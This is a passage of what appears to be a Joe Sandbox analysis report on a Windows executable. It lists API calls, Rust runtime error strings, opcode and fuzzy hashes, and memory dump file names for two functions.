                                            • String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                            • API String ID: 3114109732-122189663
                                            • Opcode ID: 64d5a3d3fa18f3a3fc433c4ccd56d879ed2de9446630ab22567387b405544f65
                                            • Instruction ID: 0b65b751540e4adafb4074e13b0f657600182f7bd8d8e24948ecb28b223792ac
                                            • Opcode Fuzzy Hash: 64d5a3d3fa18f3a3fc433c4ccd56d879ed2de9446630ab22567387b405544f65
                                            • Instruction Fuzzy Hash: 48319022F05A1299EB50EF68D8453EC73B0BB61718FA48636CF2C52799EF38D586C310
                                            Function 00007FF7B9049CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B903B590), ref: 00007FF7B9049D00
                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B903B590), ref: 00007FF7B9049D41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: e5c20127fb61fcfa79ca1083f679c47f420afe444f066555bc0ec0915a8c86cb
                                            • Instruction ID: fb321cf870c2da4a5b4bb4ba53290a868499ac5d8a00154534b0f605223c73d0
                                            • Opcode Fuzzy Hash: e5c20127fb61fcfa79ca1083f679c47f420afe444f066555bc0ec0915a8c86cb
                                            • Instruction Fuzzy Hash: DB115B32618B4282EB619F29E480269B7F4FB9AB84F984230DF9D07B59DF3CD551CB00